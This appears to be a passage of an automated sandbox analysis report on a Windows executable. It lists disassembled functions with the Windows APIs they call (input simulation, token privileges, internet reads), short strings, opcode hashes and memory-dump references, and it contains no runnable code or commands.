                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                                                    • Instruction ID: 674213219fd4bf34e5b44618b36f7aa3cc0a08bb572a2cdee6e34945df2af26b
                                                                                                                    • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                                                    • Instruction Fuzzy Hash: 110140736247818FEB108F34D4593A973A0F76476EF401929E64986A98CB7DD168CF80
                                                                                                                    Function 00007FF7BB822F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                                                                    • Instruction ID: c90887ee7739a20bc9bbd38252be24ff07e97be85de051dd529fd233e4e751e1
                                                                                                                    • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                                                                    • Instruction Fuzzy Hash: EE315851B1468148EB20AE2E9814676F691FB66BE0F848631EF5C07BECDE3CD4218350
                                                                                                                    Function 00007FF7BB86E968 Relevance: 3.1, APIs: 2, Instructions: 97networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 599397726-0
                                                                                                                    • Opcode ID: 033670ff7e53b430c0c2a2e5ac301f3bd953b7ca1ad9bb88cc673fb6edb2efd6
                                                                                                                    • Instruction ID: f5daa42a6172270bbedd877f132b01ef2a971b63314c22e60ec9fe9700b2cef0
                                                                                                                    • Opcode Fuzzy Hash: 033670ff7e53b430c0c2a2e5ac301f3bd953b7ca1ad9bb88cc673fb6edb2efd6
                                                                                                                    • Instruction Fuzzy Hash: D2319222B04A0185FB58EE2ED4507B963A1FFA9B99F944435DF0E87BA8DE38D4518390
                                                                                                                    Function 00007FF7BB8671F4 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                                                    • Instruction ID: 19afaa42ec0501ca8e01ae576b67c0569ff627c8f4e730e00512cf846d2a162f
                                                                                                                    • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                                                    • Instruction Fuzzy Hash: E7116072A0874182DB009B6EE08436CB760FB99BA0F548632DF6D077A9CF7CD4558750
                                                                                                                    Function 00007FF7BB863778 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                                                    • Instruction ID: 540abfb94697a9d4505db3a12dc718a9039b527e9365bd67ce86dba8039825d3
                                                                                                                    • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                                                    • Instruction Fuzzy Hash: 1FF0A46161874281E7606B2DF40426AE2A5FFDA794F905134EF9D42BBDDE3CD0148B50
                                                                                                                    Function 00007FF7BB84CCE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81990902-0
                                                                                                                    • Opcode ID: 3b88351c3c8e07ec62d96cf7e52e6b55e92c273785c5c0fd5bcb4e6ff751a6f7
                                                                                                                    • Instruction ID: 8181ce1efce8bda84011c686ebf3265d060945167d0526ee932f5306c26389be
                                                                                                                    • Opcode Fuzzy Hash: 3b88351c3c8e07ec62d96cf7e52e6b55e92c273785c5c0fd5bcb4e6ff751a6f7
                                                                                                                    • Instruction Fuzzy Hash: 21F0A066A14A4182EB14EB29D4153B893A0FFA9B88FA41531CF4D06268CE3CD0A682A0
                                                                                                                    Function 00007FF7BB8195B0 Relevance: 2.9, Strings: 2, Instructions: 378COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: a/p$am/pm
                                                                                                                    • API String ID: 0-3206640213
                                                                                                                    • Opcode ID: d269495295c1493308ce62522ec6a5b0fa2a34529254b4e83c29fdea4e24a2f2
                                                                                                                    • Instruction ID: b969fedc31c9622cee91e1596aa6c5f40d58238195a545f8230b7913c6edce52
                                                                                                                    • Opcode Fuzzy Hash: d269495295c1493308ce62522ec6a5b0fa2a34529254b4e83c29fdea4e24a2f2
                                                                                                                    • Instruction Fuzzy Hash: D7E1EC2290A64281E764AF1C81447BDA3A5FFAA780FD44131DF1D466ACDF3DE966C3E0
                                                                                                                    Function 00007FF7BB80C3FC Relevance: 2.7, Strings: 2, Instructions: 219COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0$0x%p
                                                                                                                    • API String ID: 3215553584-2479247192
                                                                                                                    • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                                                                    • Instruction ID: 59a7dbfa9d247e8f029006e4910f1694738288b5d8ecfada3497f6fd4b64b219
                                                                                                                    • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                                                                    • Instruction Fuzzy Hash: 52812925A1850246EAA4AE1D804067DA3D0FF637C4FD41533DF09976BDCFADE825DBA0
                                                                                                                    Function 00007FF7BB7F0E70 Relevance: 1.9, Strings: 1, Instructions: 680COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Variable is not of type 'Object'.
                                                                                                                    • API String ID: 0-1840281001
                                                                                                                    • Opcode ID: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                                                                                    • Instruction ID: 977f1a3667bc5cc4007359535ee787aa54f0fc8ba8a7ba4dfb2508081fb95729
                                                                                                                    • Opcode Fuzzy Hash: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                                                                                    • Instruction Fuzzy Hash: 99523272A186829AEB10EF6DC0501BCA361BB6A788F804036DF0D57ABDDF39F555C364
                                                                                                                    Function 00007FF7BB7FFA4F Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: no error
                                                                                                                    • API String ID: 0-1106124726
                                                                                                                    • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                                                                    • Instruction ID: ea7e342929bcd73fb5a3d2bfa4f5f0edcb65206e4539bc1828cf1b134dd192ab
                                                                                                                    • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                                                                    • Instruction Fuzzy Hash: CD12CC72A087918AE724DF2DD4402ADB3A0FB19748F904136EF4E57BA8DF38E950C794
                                                                                                                    Function 00007FF7BB85DC1C Relevance: 1.6, APIs: 1, Instructions: 124timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 481472006-0
                                                                                                                    • Opcode ID: 43d34cb52622ca6b40e86063685fd79a303f7b62810161daa31da2e35dc37d7b
                                                                                                                    • Instruction ID: e72f80a83c29269bcbbaf2e5dfc7dac7f97bd229a7223b206e4df1d1178b2615
                                                                                                                    • Opcode Fuzzy Hash: 43d34cb52622ca6b40e86063685fd79a303f7b62810161daa31da2e35dc37d7b
                                                                                                                    • Instruction Fuzzy Hash: C6418E52B1474291EA04EF29D4404FDA3B4FF66B80B845936DF1D177A9DE38E125C360
                                                                                                                    Function 00007FF7BB859420 Relevance: 1.5, APIs: 1, Instructions: 26keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InputSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3431551938-0
                                                                                                                    • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                                                    • Instruction ID: 5c5e0cc92e9672050d25e2ea03e13ac830c2d742fec3816d07e82cec0f3caddf
                                                                                                                    • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                                                    • Instruction Fuzzy Hash: C9F02E6291C6C0C6D3209F28E04076AB7A0F76978CF802119EFC903B68CB3ED11A8F04
                                                                                                                    Function 00007FF7BB85D1A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: mouse_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2434400541-0
                                                                                                                    • Opcode ID: d8d6f02688d8abf5cd4837f0aea5b825f774ed0048ed251121670875c750f025
                                                                                                                    • Instruction ID: c8907254a46daf8c817f0b291116e7eda7c385fcd345ce91c7d069369bd392ab
                                                                                                                    • Opcode Fuzzy Hash: d8d6f02688d8abf5cd4837f0aea5b825f774ed0048ed251121670875c750f025
                                                                                                                    • Instruction Fuzzy Hash: DCE09235D8C00282F268393C459AB35CA43BBB3300ED00131CF4902AFCCE1DA52297B8
                                                                                                                    Function 00007FF7BB870A00 Relevance: 1.5, APIs: 1, Instructions: 23keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BlockInput
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3456056419-0
                                                                                                                    • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                                                                    • Instruction ID: 6bf2e75631cbf219b510628b81c56cb4947cb11f259a94e7d96c27b2f3529428
                                                                                                                    • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                                                                    • Instruction Fuzzy Hash: 5CE0653271424286EB44AB7EE444679E290BFA9B84F545035DF0D87769DE7CD4D08750
                                                                                                                    Function 00007FF7BB842BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2645101109-0
                                                                                                                    • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                                                    • Instruction ID: b5a4927cc0ba55f4b2174f62c8a6b3a223aa08f47f61b5ac83905633b0c18828
                                                                                                                    • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                                                    • Instruction Fuzzy Hash: B7C0C961A1469299EB60DF28D8881EC2330F710718FC01022EA0A0E87C9F789248C340
                                                                                                                    Function 00007FF7BB80BEB4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                                    • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                                                                    • Instruction ID: 67f5e70980440a970cd813d8dc9331c3e071fa2c1e08f987f8f69cb19fc7f4fd
                                                                                                                    • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                                                                    • Instruction Fuzzy Hash: AD71C511A0C28246EA68AE1D904027DD7D2BF63BC4FD40536DF08876FDCE6DE865CBA1
                                                                                                                    Function 00007FF7BB7F58D0 Relevance: .7, Instructions: 692COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
